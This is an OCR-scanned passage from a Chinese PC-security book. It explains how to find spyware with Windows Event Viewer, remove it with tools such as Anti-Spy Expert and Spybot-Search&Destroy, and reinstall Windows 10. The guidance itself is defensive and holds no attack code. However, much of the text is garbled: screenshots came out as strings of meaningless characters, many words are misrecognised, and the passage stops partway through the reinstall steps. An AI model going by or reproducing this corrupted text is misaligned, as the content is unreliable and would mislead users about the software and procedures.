件 ， 这 都 有 可 能 导致 系统 崩溃 或 无 法 进入 操作 系统 ， 这 时 用 户 就 不 得 不 重 装 系统 ， 但 
是 如 果 对 系统 进行 了 备份 ， 那 么 就 可 以 直接 将 其 还 原 ， 以 节省 时 间 。 本 章 介绍 电脑 系 
统 安全 的 防护 策略 ， 主 要 内 容 包 括 清 除 系统 恶意 软件 、 系 统 备 份 、 系 统 还 原 及 系统 重 


置 等 。 


6.1 系统 安全 之 清理 间谍 软件 


间谍 软件 是 一 种 能 够 在 用 户 不 知情 的 
情况 下 ， 在 其 计算 机 上 安装 后 门 、 收 集 用 
户 信息 的 软件 。 间 谍 软 件 以 恶意 后 门 程序 
的 形式 存在 ， 该 程序 可 以 打开 端口 、 启 动 
ftp 服 务 器 或 者 搜集 击 键 信 息 并 将 信息 反馈 
给 攻击 者 。 


6.1.1 使 用 “事件 查看 器 ”清理 


不 管 我 们 是 不 是 电脑 高 手 ， 都 要 学 会 
自己 根据 Windows 自 带 的 “事件 查看 器 ”对 
应 用 程序 、 系 统 、 安 全 和 设置 等 进程 进行 
分 析 与 管理 。 

通过 “事件 查看 器 ”查找 间谍 软件 的 
具体 操作 步 又 如 下 。 
右 击 “ 此 电脑 ”图 标 ， 在 弹出 的 快捷 
菜单 中 选择 “管理 ”选项 。 


打开 (0) 
国定 对" 快 速 访 问 " 
四 和 
二 下 才 始 所 Pp) 人 


_ 遇 网 络 驱动 器 (N) 


疡 开 网 络 驱 动 器 的 连接 ( 〇 … 
创建 快捷 方式 (S) 


删除 (D) 
重 命名 (M) 


Mi 尾 性 (R) 
Explorer 


Step 图 弹出 “计算 机 管理 ”对 话 框 ， 在 其 中 


可 以 看 到 系统 工具 、 存 储 、 服 务 和 应 用 程 
序 三 个 方面 的 内 容 。 
蓝 计 其 嘱 管理 一 口 时 


文件 中 ”强人 FA 坦 看 W) 帮助 H) 
旬 哆 | 四 | 已 | 目 回 


[step 图 在 左 侧 依 次 展开 “计算 机 管理 (本 
地 ) ”一 “系统 工具 ”一 “事件 查看 器 ” 
选项 ， 即 可 在 下 方 显示 事件 查看 器 所 包含 
的 内 容 。 


EE o x 
让 汪 0) 下 春 M。 二 (Hl) 

和 中 | 十 司 目 局 
ET 

~ 0 ET 


» © Si 
~ 四 4 大 ~ 
HR 于 


天 ferosoft-WS-Licensing /admin 
[ee | 于 At-WS-Licensing/ad ”| 日 mm 
S=s | 
开放 生生 加 ET 

es 二 | 
过 a 
A | 
| ess 


step 加 双击 “Windows 日 志 ” 选 项 ， 即 可 在 
右 侧 显示 有 关 Windows 日 志 的 相关 内 容 ， 包 
括 应 用 程序 、 安 全 、 设 置 、 系 统 和 已 转发 
事件 等 。 


SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


双击 右 侧 区 域 中 的 “应 用 程序 ” 选 
项 ， 即 可 在 打开 的 界面 中 看 到 非常 详细 的 
应 用 程序 信息 ， 其 中 包括 应 用 程序 被 打 
开 、 修 政 、 权 限 过 户 、 权 限 登 记 、 关 闭 及 
重要 的 出 错 或 者 兼容 性 信息 等 。 


[step 图 右 击 其 中 任意 一 条 信息 ， 在 弹出 的 快 
捷 菜单 中 选择 “事件 属性 ”命令 。 


AN EBV) Moi 
和 中 | 直 问 | 目 运 


step[ 打开 “事件 属性 ”对 话 框 ， 在 该 对 话 
框 中 可 以 查看 该 事件 的 常规 属性 及 详细 信 
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机 -ET 三 -日 x 国 要 -要 < 16394，seourirspp x 
ET a 
和 中 | 玫 国 目 国 LE 
ET LF 要 迁移 达 现 . 
~ ER 
© eeriem 
Se 
后 eXn 
indors 5 
加 EsaRM Se 和 
目 仁 BG eri aa a002p 113111 a 
司 sf 事 咱 IntFh 16394 {SIM: 天 
目 ERA my 本 FM: a 
me MP se ENR DeskTOP -JNMOC 
A ok 5 
nh Sa BE 
Bs 
es 
vn 
Cad SP X09 


右 击 其 中 任意 一 条 应 用 程序 信息 ， 
在 弹出 的 快捷 菜单 中 选择 “保存 选择 的 事 
件 ” 命 令 ， 弹 出 “另存 为 ”对 话 框 ， 在 
“文件 名 ”文本 框 中 输入 事件 的 名 称 ， 并 
选择 事件 保存 的 类 型 。 


加 5 x 


me 四 “ze 
Pore 360s Fles 
[ 2 半 SQL Server Management Studio 
a 


CJ] 广 机 


单 击 “保存” 按钮 ， 即 可 保存 事件 ， 
并 弹出 “显示 信息 ”对 话 框 ， 在 其 中 设置 
是 否 要 在 其 他 计算 机 中 正确 查看 此 日 志 。 
设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 即 可 保存 


设置 。 


区 = 到 | 归 


[Sep 图 双击 左 侧 的 “安全 ”选项 ， 可 以 将 电 
脑 记录 的 安全 性 事件 信息 全 都 枚 举 于 此 ， 


用 户 可 以 对 其 进行 具体 查看 和 保存 、 附 加 
程序 等 。 


双击 左 侧 的 “Setup” 选 项 ， 在 右 侧 
将 会 展开 系统 设置 详细 内 容 。 


Estee 本 双击 左 侧 的 “系统 ”选项 ， 会 在 右 侧 
看 到 Windows 操 作 系 统 运行 时 内 核 及 上 层 软 
硬件 之 间 的 运行 记录 ， 这 里 面 会 记录 大 量 的 
错误 信息 ， 是 黑客 们 分 析 目 标 计 算 机 漏洞 时 
最 常用 到 的 信息 库 ， 用 户 最 好 熟悉 错误 码 ， 
这 样 可 以 提高 查找 间谍 软件 的 效率 。 


如 中 | 南 辣 | 目 尿 
本 Tan 
~ Nl seIR 


ema 
amnanaiz11a451 。 windo_ 
EY 


Beasasses 


EE 


第 6 章 ”电脑 系统 安全 的 防护 策略 一 于 


6.1.2 使 用 《 反 间 谍 专 家 》 清 理 


使 用 《 反 间 谍 专 家 》 可 以 扫描 系统 薄弱 名 
环节 及 全 面 扫描 硬盘 ， 智 能 检测 和 查 杀 超过 
上 万 种 木马 、 蠕 虫 、 间 谍 软 件 等 ， 终 止 它们 
的 恶意 行为 。 当 检测 到 可 疑 文件 时 ， 该 工具 
还 可 以 将 其 隔离 ， 从 而 保护 系统 的 安全 。 

下 面 介绍 使 用 《 反 间 谍 专 家 》 软 件 清 
rat 
运行 反 间 谍 专 家 程序 ， 即 可 打开 “ 反 
et 主 界面 ， 从 中 可 以 看 出 《 反 间 谍 
专家 》 有 “快速 查 杀 ”和 “完全 查 杀 ” 两 种 
方式 。 


加 到 有 
3T81 上 网 助手 


avarey Spyrare 等 于 生怕 件 能 对 留 在 用 户 
Se 六 守 下 对 亚 意 软件 发 者 有 逢 的 请 息 * 
人 


Ea 


ee 


帮 始 要 久 


Ee 加 在 “ 坦 杀 ”栏目 中 单 去 “快速 查 杀 ” 

按钮 ， 然 后 在 右边 的 窗口 中 单 击 “ 开 始 查 

杀 ” 按 钮 ， 即 可 打开 “扫描 状态 ”对 话 框 。 
BB tera manine 


了 名 机 二 
信 正 在 所 。。 内存 驻 全 等 序 扫 交 [3 
注册 表 守 攻 
edkis，kinars 委 各 
ee 


Cisaorssyatemaztiegracy AL 
El. BM Wo 1 


[step 图 在 扫描 结束 后 ， 即 可 打开 “扫描 报 
告 ” 对话 框 ， 在 其 中 列 出 了 扫描 到 的 恶意 
代码 。 


Ey 
三 回 cM 件 关联 


路 径 : chm.fie\sheNopen\command 
回 二 寺 六 kCHN 件 关 阴 的 可 经 程 序 


= 回 es 


回 加 本 hai whehooervconmanl 
EE 
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[eg 加 单 二 “选择 全 部 ”按钮 即 可 选中 全 部 
的 恶意 代码 ， 然 后 单 去“ 清除 ”按钮 ， 即 
可 快速 杀 除 扫描 到 的 恶意 代码 。 


”ee 志 厂 ， 2 个 本 总 代 则 访 击 除 ， ! 个 下 意 代码 全 高 区 中 被 清除- 


[Step 图 如 果 要 彻底 扫描 并 查 杀 恶意 代码 ， 则 
需 采 用 “完全 查 杀 ”方式 。 在 “ 反 间 谍 专 
家 ” 主 窗口 中 ， 单 击 “ 完 全 查 杀 ”按钮 ， 
即 可 打开 “完全 查 杀 ”对 话 框 。 从 中 可 以 
看 出 完全 查 杀 有 三 种 快捷 方式 供 选择 ， 这 
里 选中 “扫描 本 地 硬盘 中 的 所 有 文件 ” 单 
选 按钮 。 


区 四 
2 Ew @ ms 
尽 3721 上 网 助手 
i 快 二 方式 
轩 -438rinaos 系 绵 目 录 T 的 文件 
人 国 Hash 档 中 的 广 件 
gy 国 “em 有 
EE 
二 Cs] 
自 定义 扫 入 | 
埠 :3 规 指定 日 录 中 的 文件 日 定 X 可 和 
大 有 I 丰 加 | 
IR | 


[5g 单 去 “开始 查 杀 ”按钮 ， 即 可 打开 
“扫描 状态 ”对 话 框 ， 在 其 中 可 以 查看 查 
杀 进 程 。 

Es 

tins, Ges 


名 称 
内 存 驻 留 程序 扫描 


系统 大 区 域 扫 失 
磁盘 文件 扫描 


所 正在 扫描 


C: MTINDONS\systen32\dlleache\nwevent. dl 


| 正在 扫 柑 ， 悍 时 00:00:07 


[step 国 待 扫描 结束 后 ， 即 可 打开 “扫描 报 
告 ” 对 话 框 ， 在 其 中 列 出 所 扫描 到 的 悉 意 
代码 。 勾 选 要 清除 的 恶意 代码 前 面 的 复 选 
框 后 ， 单 击 “ 清 除 ” 按钮 即 可 出 除 这 些 恶 
意 代 码 。 
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责问 已 专 家 扫 蔚 报 容 


扫描 完成 , 发 现 91 个 恶意 代码 9 
5 回 Doubledick Cooke 


路 径 : C:\..…\Temp\Cookies\administrator@doublecick[1].txt 已 隔 襄 
回 项 述 :无 
3 回 和 用 Ms04.028 涡 gpPEG 广 伯 数量 :90 
路 径 : Ei 永源 科 技 软件 礼包 \ 图 片 新 建文 伯 天 \1,JPG EAR 
回 鸥 本 无 
路 径 ; E:\ 永 源 科技 软件 礼包 \ 图 片 \ 新 建文 件 夷 \2,JPG 已 隔 高 
回 雹 二 无 图 
Lasses ] [EL Cm 


Eee 团 在 “ 反 间 谍 专 家 ” 主 界面 中 切换 到 

常用 工具 ”栏目 中 ， 单 击 “ 系 统 免疫 ?” 
接 和 认可 村 并 “系统 免疫 ”对 话 框 ， 单 击 
“启用 ”按钮 ， 即 可 确保 系统 不 受到 恶意 
程序 的 攻击 。 


加工 EY 
反 间 谋 专家 
第 用 工具 ES 昌 
[3 不 坊 多 妆 功 能 
功能 可 以 保证 悠 的 系统 不 再 受到 某 此 恶意 网 
A 站 、 同 计 软 件 、 有 着 ActiveX 近 
恒通 过 *“ 探 礼 来 罕 看 已 免疫 的 数量 ,以 及 通过 
外 “ 抽 司 ” 控 村 未 地 届 已 经 启用 的 旬 疫 功能， 
IE 修复 
名 948 项 书局 用 / 各 失 1089 项 ， 
隔 襄 区 [ 局 用 ] [ 检查 ] [ 擅 铀 | 
高 煞 I 具 司 | 


单 击 “IE 修 复 ” 按 钮 ， 即 可 打开 “IE 
修复 ”对 话 框 ， 在 选择 需要 修复 的 项 目 之 
后 ， 单 击 “ 立 即 修复 ”按钮 ， 即 可 将 IE 恢 
复 到 其 原始 状态 。 


le td [J 


王 修复 能 稻 助 您 恢复 被 委 意 代码 牙 改 的 IE 以 及 Windows 常 用 工具 ， 点 击 “ 立 即 修复 ” 
控 电 可 以 进行 快速 修复 . 


名 称 竺 
回 修复 重新 开机 后 于 浏览 器 又 六 感 内 的 问题 0 自动 漳 出 下 窗口) 和 修复 
回 会 复 全 浏览 默认 的 搜索 引擎 待 修复 
回 依 复 TE 为 默认 浏览 器 符 修 复 
回 修复 被 地 法 改写 的 文件 自 妇 日 期 和 系统 时 间 竺 修复 一 
回 修复 开始 荣 单 中 "注销 -运行 “关闭 "项 消失 竺 修复 
回 修复 -我 的 电脑 "中 请 全 入 之 的 问 和 修复 
回 修复 开机 后 弹出 对 话 愉 的 问题 待 修复 。 四 | 
CE Ce 


step 回 单 去 “隔离 区 ”按钮 ， 则 可 查看 已 经 
隔离 的 恶意 代码 ， 选 择 隔 离 的 恶意 项 目 可 
以 对 其 进行 恢复 或 清除 操作 。 


于 站 代码 已 释 党 赤 区 进行 民 训 ， 不 全 他 的 未 扩 和 区 生 过 。 匈 r 护 记忆 的 宇和 
直接 进行 洁 除 ， 豆 持 其 记名 到 原 未 的 朋 位 畦 下. 


Cam CE CR Cm) 


单 击 “ 高 级 工具 ”功能 栏 ， 即 可 进入 
“高 级 工具 ”设置 界面 。 


Ou 
A 上 MF 


EL 


双 办 不 续 中 下 让 二 行 的 六 得 Laesap | 


过 和 
有 各 
名 不 统 中 正 友和 服 
扣 革 各 
由 pe 
EE 人 


RF 


单 击 “ 进 程 管理 ”按钮 ， 即 可 打开 
“进程 管理 器 ”对 话 框 ， 在 其 中 对 进程 进 
行 相应 的 管理 。 


FWDMS\ syst on esrss ore 
用 者 me re oe 
口罩 pmre pm 


A 


7 


[si [| 和 
[step 了 图 单 击 “ 服 务 管 理 ” 按 钮 ， 即 可 打开 
“服务 管理 器 ”对 话 框 ， 在 其 中 对 服务 进 
行 相应 的 管理 。 
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step 贺 单 击 “ 网 络 连 接管 理 ” 按 钮 ， 即 可 打 
开 “ 网 络 连 接管 理 器 ”对 话 框 ， 在 其 中 对 


网 络 连接 进行 相应 的 管理 。 
进程 靖 吕 了 李 地 IT 运程 IP 类型 状态 全 | 
0000 TCP 和 
192 168.0.11 WP ”等 待 关闭 
192 168 0 11 TDP 等 待 闭 | | 
192 169.0.11 ICP 。 等待 注 接 
Qo000 TCF ”等待 连 按 
Goo0 WF ”等待 关闭 
Qoo0 UDP ”等 竺 关闭 
127 0.0.1 TCF ”等待 连 授 
0000 WP ”等 竺 关闭 
127 0.0.1 WP ”等 竺 关闭 
0000 TDP ”等 待 关 闭 
Dooo TDP ”等 待 关闭 
0.00.0 WP ”等 待 关闭 
127 0.0.1 IDP 。 等 待 关闭 加 | 
Cm CR 


选择 “工具 ”一 “综合 设 定 ” 菜 单 
项 ， 即 可 打开 “综合 设 定 ” 对 话 框 ， 在 其 
中 对 扫描 设 定 进行 相应 的 设置 。 

1 


后 设 定 | 查 床 设 定 】 其 他 | 
扫 扩 设 定 
厂 提 六 FE 沂 文 件 
局 


厅 仅 扫描 识别 的 扩展 名 (. exe，. dl，. vbs 等 ) 


[ep 图 选择 “ 查 杀 设 定 ” 选 项 卡 ， 即 可 进入 
“ 查 杀 设 定 ” 设 置 界面 ， 在 其 中 设置 发 现 
恶意 程序 时 的 缺 省 动作 。 
3. [x] 
ET 
发 现 委 意 程序 时 的 缺 省 动作 
提示 个 删除 个 隔离 


个 忽略 


CE 
[图 选择 “其 他 ”选项 卡 ， 即 可 进入 “其 


这 Iternat 连 按 具 享 和 TtEcnet 连接 防 天 墙 提供 第 三 广 饰 以 括 件 的 支持 


[Es |] (| 


他 ”设置 界面 ， 在 其 中 名 选 “允许 右键 菜 
单 选择 扫描 ” 复 选 框 ， 单 击 “ 确 定 ” 按 
钮 ， 即 可 完成 设置 操作 。 
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是 《Windows 清 理 助手 》 是 一 款 可 以 自 定 
义 规 则 的 查 杀 程 序 ， 使 用 它 可 以 清理 网 上 
大 部 分 间谍 软件 ， 还 可 以 根据 用 户 的 需求 
建立 白 名 单 与 黑 名 单 ， 做 到 完全 可 自 定义 
是 否 清理 。 
使 用 《Windows 清 理 助手 》 清 理 间 谍 软 
件 的 具体 操作 步骤 如 下 。 
[step 回 双 去 下 载 的 《Windows 清 理 助手 》 可 
执行 程序 ， 即 可 打开 “Windows 清 理 助手 ” 
工作 界面 。 


nd 
[SEE 


step 图 单 击 “立即 扫描 ”按钮 ， 即 可 开始 打 
描 电 脑 中 的 间谍 软件 ， 并 在 下 方 显示 扫描 


windows 
br 清理 勋 竹 3.> 
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[Sep 图 扫描 完成 后 ， 给 出 相应 的 提示 信息 ， 
提示 用 户 发 现 未 知 的 风险 程序 ， 是 否 提交 
给 技术 人 员 进 行 分 析 ， 这 里 单 击 “ 是 ” 
按钮 。 


© 发 现 示 和 的 内 村 所 是 否 提 交 治 技术 人 员 进 行 分 析 ? 


此 有 全 有 旬 于 提高 了 0 手 的 涤 理 纸 力 ! 
提交 的 信息 不 全 二 沽 所 的 个 人 隐私 所 可 以 在 设置 中 关闭 此 功能 
二 学 是 ", 以 后 提交 时 和 不 再 示 ， 


分 析 完 成 后 ， 返 回 到 “Windows 清 理 
助手 ”工作 界面 ， 在 其 中 选择 需要 清理 的 
对 象 。 


Er 


单 击 “ 执 行 清理 ”按钮 ， 弹 出 一 个 信 
息 提示 框 ， 提 示 用 户 是 否 备份 相应 的 文件 / 


注册 表 信 息 ， 这 里 单 击 “ 是 ”按钮 。 


Step 图 备份 完成 后 ， 即 可 开始 清理 扫描 出 来 
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的 间谍 软件 ， 并 显示 扫描 的 进度 。 


执行 清理 


ss 


step 园 在 “常用 功能 ”选项 列表 中 选择 “ 诊 
断 报告 ”选项 ， 进 入 “诊断 报告 ”工作 
界面 。 


[Sr 


[tp 图 单 去 “请 点 击 此 处 ， 开 始 诊断 ” 按 
钮 ， 即 可 开始 诊断 系统 ， 并 在 下 方 显示 诊 
断 的 进度 。 


windows 


清理 一 手 3.， EE 
Mae FF 
ba | 
| ere ey 
eee 
Rw 水 上 入 所 流 备 
Bum | Ra 新 和 用 各 护 
ee 
os 7 庄 suv 闪 车 大 全 
一 机 斯 这 改 区 
Poem 
| 所 长 安 欧尚 7 座 mp 
PT 一 
© Ht 
uv 
tm Tn ED i 


选择 “故障 修复 ”选项 ， 进 入 “故障 
修复 ”界面 ， 在 其 中 选择 需要 修复 的 对 象 。 


windows 
消 香山 季 3. EE 
mh es 人 
nat 
SF nen 
Een 
TT rp 


[See 加 单 去 “执行 修复 ”按钮 ， 弹 出 “故障 
修复 ”对 话 框 ， 提 示 用 户 修复 前 暂时 关闭 
正在 运行 的 监控 程序 。 


Step 加 单 去 “是 ”按钮 ， 即 可 开始 修复 系 
统 ， 待 修复 完成 后 弹出 “故障 修复 ”对 话 
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框 ， 提 示 用 户 修复 操作 执行 完成 。 


x 
@ "=r 


step 图 选择 “痕迹 清理 ”选项 ， 在 打开 的 界 
面 中 选择 要 清理 的 文件 和 注册 表 项 。 


二 windows 
B94 


i 雪人 后 


3 
Faure egw 


sees Ee 
Bae 
Ramer | ee 
二 sa DT 
加 mr Bp Fig 
2 ey 
re 
和 sm 口 和 RR 
Daman 
Daca 


_ 口 Ess3mPg 


[Eee 本 单 二 “分 析 ” 按 锂 ， 即 可 开始 分 析 冰 
二 途 ， 并 在 右 侧 的 窗 格 中 显示 分 析 结 果 


windows 
B94 


来 的 痕迹 。 


S330 ee m1 0 Oe ti (EY 


Step 图 选择 “文件 操作 ”选项 ， 进 入 “文件 


Lg 


操作 ”界面 ， 通 过 单 击 “添加 ”按钮 ， 可 
以 添加 相应 的 文件 。 


windows 
p 乡 理 助手 3.3 


ee 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


面 中 可 以 查看 “Windows 清理 助手 ”提供 
的 更 多 系统 维护 工具 。 


RF) windows 


面 中 可 以 查看 清理 时 的 日 志 记录 。 


we 


FR 


step 可 单 击 “清空 ”按钮 ， 弹 出 “日 志 记 
录 ” 对 话 框 ， 提 示 用 户 是 否 确定 要 清除 所 
有 的 历史 记录 ， 单 击 “ 是 ”按钮 ， 即 可 清 
空 所 有 的 历史 记录 。 


@ “ese 


[mde] (Be) 


[se 图 选择 “高 级 功能 ”选项 ， 在 弹出 的 
列表 中 选择 “脚本 对 象 ” 选 项 ， 在 其 中 可 
以 启用 “Windows 清 理 助 手 ” 的 脚本 对 象 
功能 。 


Step 图 选择 “更 多 工具 ”选项 ， 在 打开 的 界 
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EE 本 翅 手 3.， @。 和 
pr RRR | eT 
区 en | 西 让 元 wt | ran 
F 本 已。 加 加- 
wen 3 > 
> = Cus Qe Be 
访 mao [ .| 一 机 | 
| [ar i 是 [CT [Bes ou 
流 wx 嘱 | as 
[Eee 图 选择 “清理 相关 ”选项 ， 在 打开 的 界 图 = 一 挟 : 


I 3307 eee) Hl 7 ele e071 (EE TH | 


6.1.4 使 用 Spybot-Search&Destroy 
清理 


Spybot-Search&Destroy 是 一 款 专 门 用 
来 清理 间谍 程序 的 工具 。 到 目前 为 止 ， 
它 已 经 可 以 检测 一 万 多 种 间谍 程序 (Spy- 
ware) ， 并 对 其 中 的 一 千 多 种 进行 免疫 处 
理 。 而 且 这 个 软件 是 完全 免费 的 ， 并 有 中 
文 语言 包 支 持 ， 可 以 在 Server 级 别 的 操作 系 
统 上 使 用 。 

下 面 介 绍 使 用 Spybot-Search&Destroy 软 
件 查 杀 间 谍 软 件 的 具体 操作 步骤 。 
安装 Spybot-Search&Destroy 并 设置 好 
初始 化 后 ， 即 可 打开 其 主 窗口 。 


- 0O x 


Spybot - Search & Destroy 


gt uton to ton sce to ten loss 
ns 


ots poem yeeice ean pobieme tathare 
aomm rng a esert ovald ppbiems anyouwant 
Ounce sone changee 

Thets wey npntarr tarecarnendedt wrale he 
$0 Soh pdaes dteciem aeatenrceavesh 


[Sep 加 由 于 该 软件 支持 多 种 语言 ， 所 以 在 
其 主 窗口 中 选择 “Language” 一 “简体 中 
文 ” 命 令 ， 即 可 将 程序 主 界面 切换 为 中 文 
模式 。 
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加 spybot- Search a Dectroy - 口 % 
六 首 站 六 MI] 生计 中 BH| 


Cee Rei 
人 


区 


单 击 其 中 的 “检测 ”按钮 或 单 击 左 侧 
的 “检查 与 修复 ”按钮 ， 即 可 打开 “检测 
与 修复 ”窗口 ， 并 单 击 “检测 与 修复 ” 按 
钮 ，Spybot 此 时 即 可 开始 检查 系统 找到 的 存 
在 的 间谍 软件 。 


| Espybot Search & Doctroy 
实 件 全 异 开 D 理 襄 GD 部 且 0 


5 页) 检测 与 修复 
并 潮 队 与 和 寺 而 


日 检 与 褒 丰 (2) 
X Ft | 本 Wm 


正在 得志 间 谋 与 广告 程 尿 (126021/471572; Win32. Agent ofy) 


[step 图 在 软件 检查 完毕 后 ， 检 查 页 上 将 会 
列 出 在 系统 中 查 到 可 能 有 问题 的 软件 。 选 
取 某 个 检查 到 的 问题 ， 再 单 击 右 侧 的 分 栏 
箭头 ， 即 可 查询 到 有 关 该 问题 软件 的 发 
布 公 司 、 软 件 功能 、 说 明和 危害 种 类 等 
信息 。 


| BSpybot- Seorch a Destroy a 
文件 人 模式 0) 生计 人 划 且 0 


检测 与 修复 
座 刑 开 清 陆 吨 种 有 和 而 三 


DG 一 是 虽 二 HG 二 型 四 


OO 5 


问 
(GIT SCRkslPa) ¥ 
mh 


自 回 tabee seer 


(ET Seoofakea) ¥ 
GD 


Re 
加 
a 


| 
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step 图 选中 需要 修复 的 问题 程序 ， 单 击 “ 修 
复 ” 按 钮 ， 即 可 打开 “确认 ”提示 框 。 


局 
© 要 要 弄 险 这 些 项 目 。 要 继续 喇 ? 
Cav ] am | 
step 国 单 击 “是 ”按钮 ， 即 可 看 到 在 下 次 系 
统 启 动 时 自动 运行 提示 框 。 
3 
企 和 
这 些 问题 可 以 在 系统 重新 让 
要 Spybot-S&&D 在 下 次 系统 启动 时 号 动 运行 吗 ? 
Cav ] am | 


单 击 “ 是 ”按钮 ， 即 可 将 选取 的 间 
谍 程 序 从 系统 中 清除 。 修 复 后 的 结果 如 下 
图 所 示 ， 其 中 以 Y 标识 已 经 成 功 修复 的 问 
题 ， 以 狼 标 识 修复 不 成 功 的 问题 。 


| 居 spybee -Seorch peeroy -6 x 


| 汪 fp 二 种 四 


[| 


条 
TT 
i 


四 日 画 过 


时 时 量 口 


i 
各 
录 
a 


[step 图 待 修复 完成 后 ， 即 可 看 到 “确认 ” 
提示 框 。 在 其 中 会 实现 成 功 修复 及 尚未 修 
复 问题 的 数量 ， 并 建议 重启 计算 机 。 单 击 
“确定 ”按钮 ， 重 启 计算 机 修复 未 修复 的 
问题 即 可 。 


确认 


@O'" 
1 个 


问题 已 被 修复 。 
问题 尚未 被 修 复 。 请 重新 启动 计算 机 4 


[ssp 图 选择 “还 原 ” 选 项 ， 在 打开 的 界面 
中 选择 需要 还 原 的 项 目 ， 单 击 “还原 ” 
按钮。 


%9 


[CE 


Be 图 弹出 “确认 ”信息 提示 框 ， 提 示 用 户 
是 否 要 撤销 先前 所 做 的 修改 。 


确认 


(2) 起 正 并 管 沿 Spybot-S&&D 先 且 所 他 的 修 冯 要 疙 演 
呵 ? 


CG [aw 
单 击 “是 ”按钮 ， 即 可 将 修复 的 问题 
还 原 到 原来 的 状态 ， 还原 完毕 后 弹出 “ 信 
息 ” 提 示 框 。 


信息 


0@ Pr 委 要 重新 检 济 才能 使 裕 还 原 的 项 目测 现在 结 黑 
Ca | 

选择 “免疫 ”选项 ， 进 入 “免疫 ” 设 

置 界 面 ， 免 疫 功能 可 使 用 户 的 系统 具有 抵 

御 间 谍 软 件 的 免疫 效果 。 


spyboe Soarch & Doroy Ss 
文件 (9 惯 式 Wi 语言 (L) 帮助 If) 


日 柱 和 与 检 复 人) RE 
保 估 过 人 向 天 元 法 入 售 ， 


+ brie Ba se Ds a 


"a anyeo 


因 四 四 四 四 


习 四 四 


RE 


重 装 Windows 10 操 作 系 统 


在 安装 有 一 个 操作 系统 的 计算 机 中 ， 
用 户 可 以 利用 安装 光盘 重 装 系统 ， 而 无 须 
考虑 多 系统 的 版 本 问题 ， 只 需 将 系统 安装 


6.2 
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盘 插 入 光驱 ， 并 设置 从 光驱 启动 ， 然 后 格 
式 化 系统 盘 ， 就 可 以 像 安 装 单 操作 系统 一 
样 重 装 单 系统 。 


6.2.1 什么 情况 下 重 装 系统 


具体 来 讲 ， 当 系统 出 现 以 下 3 种 情况 之 
一 时 ， 就 必须 考虑 重 装 系统 了 。 


1. 系统 运行 变 慢 


系统 运行 变 慢 的 原因 有 很 多 ， 如 垃圾 
文件 分 布 于 整个 硬盘 而 又 不 便于 集中 清理 
和 自动 清理 ， 或 者 是 计算 机 感染 了 病毒 或 
其 他 恶意 程序 而 无 法 被 杀毒 软件 清理 等 ， 
这 就 需要 对 磁盘 进行 格式 化 处 理 并 重 装 系 
统 了 。 


2. 系统 频繁 出 错 


众所周知 ， 操 作 系 统 是 由 很 多 代码 组 
成 的 ， 在 操作 过 程 中 可 能 由 于 误 删除 某 个 
文件 或 者 是 被 恶意 代码 改写 等 原因 ， 致 使 
系统 出 现 错误 ， 此 时 ， 如 果 该 故障 不 便于 
准确 定位 或 轻易 解决 ， 就 需要 考虑 重 装 系 
统 了 。 


3. 系统 无 法 启动 


导致 系统 无 法 启动 的 原因 有 多 种 ， 如 
DOS 引 导出 现 错 误 、 目 录 表 被 损坏 或 系统 
文件 ntfs.sys 文 件 丢 失 等 。 如 果 无 法 查找 出 
系统 不 能 启动 的 原因 或 无 法 修复 系统 以 解 
决 这 一 问题 时 ， 就 需要 重 装 系统 了 。 


6.2.2 重 装 前 应 注意 的 事项 


在 重 装 系统 前 ， 用 户 需要 做 好 充分 的 
准备 ， 以 避免 重 装 后 造成 数据 的 丢失 等 严 
重 后 果 。 那 么 在 重 装 系统 前 应 该 注意 哪些 
事项 呢 ? 


1. 备份 数据 


在 因 系统 崩溃 或 出 现 故 障 而 准备 重 装 
系统 前 ， 首 先 应 该 想到 的 是 备份 好 自己 的 


数据 。 这 时 ， 一 定 要 静 下 心 来 ， 仔 细 罗 列 
一 下 硬盘 中 需要 备份 的 资料 ， 把 它们 一 项 
一 项 地 写 在 一 张 纸 上 ， 然 后 逐一 对 照 进行 
备份 。 如 果 硬 盘 不 能 启动 ， 这 时 需要 考虑 
其 他 启动 盘 启动 系统 ， 然 后 复制 自己 的 
数据 ， 或 将 硬盘 挂 接 到 其 他 电脑 上 进行 备 
份 。 但 是 ， 最 好 的 办 法 是 在 平时 就 养 成 每 
天 备份 重要 数据 的 习惯 ， 这 样 就 可 以 有 效 
避免 硬盘 数据 不 能 恢复 造成 的 损失 。 


2. 格式 化 磁盘 


重 装 系统 时 ， 格 式 化 磁盘 是 解决 系统 
问题 最 有 效 的 办 法 ， 尤 其 是 在 系统 感染 病 
毒 后 ， 最 好 不 要 只 格式 化 C 盘 ， 如 果 有 条 件 
将 硬盘 中 的 数据 都 备份 或 转移 ， 尽 量 备份 


后 将 整个 硬盘 都 格式 化 ， 以 保证 新 系统 的 
安全 。 

3. 牢记 安装 序列 号 

安装 序列 号 相当 于 一 个 人 的 身份 证 
号 ， 标 识 着 安装 程序 的 身份 ， 如 果 不 小 心 
丢掉 自己 的 安装 序列 号 ， 那 么 在 重 装 系统 


时 ， eg 安装 过 程 将 
无 法 进行 下 去 。 正 规 的 安装 光盘 的 序列 号 
会 标注 在 软件 说 明 书 或 交角 封套 I 某 个 位 
置 上 。 但 是 ， 如 果 用 的 是 某 些 软件 合集 光 
盘 中 提供 的 测试 版 系统 ， 那 么 ， 这 些 序列 
号 可 能 是 存在 于 安装 目录 中 的 某 个 说 明文 
本 中 ， 如 SN-txt 等 文件 。 因 此 ， 在 重 装 系统 
之 前 ， 首 先 将 序列 号 找 出 并 记录 下 来 以 备 
稍 后 使 


6.2.3 ”使 用 安装 光盘 重 装 Windows 10 


Windows 10 作 为 新 一 代 操 作 系 统 ， 备 
受 关注 ， 本 小 节 将 介绍 Windows 10 操 作 系 
统 的 重 装 ， 具 体 的 操作 步骤 如 下 。 
[step 图 将 Windows 10 操 作 系 统 的 安装 光盘 
放 入 光驱 中 ， 重 新 启动 计算 机 ， 这 时 会 进 
入 Windows 10 操 作 系 统 安装 程序 的 运行 窗 
口 ， 提 示 用 户 安装 程序 正在 加 载 文件 。 


第 6 章 


入 程序 启动 


step 图 当 文件 加 载 完 成 后 ， 进 
Windows 界 面 。 


开始 运行 程序 ， 


step 回 进入 程序 运行 界面 ， 
并 且 显 示 程 序 的 运行 速度 。 


[step 轩 运行 程序 完成 ， 就 会 弹出 安装 
Windows 窗 口 ， 根 据 需 求 进行 设置 ， 一 般 这 
里 设置 为 默认 。 


是 windows- 
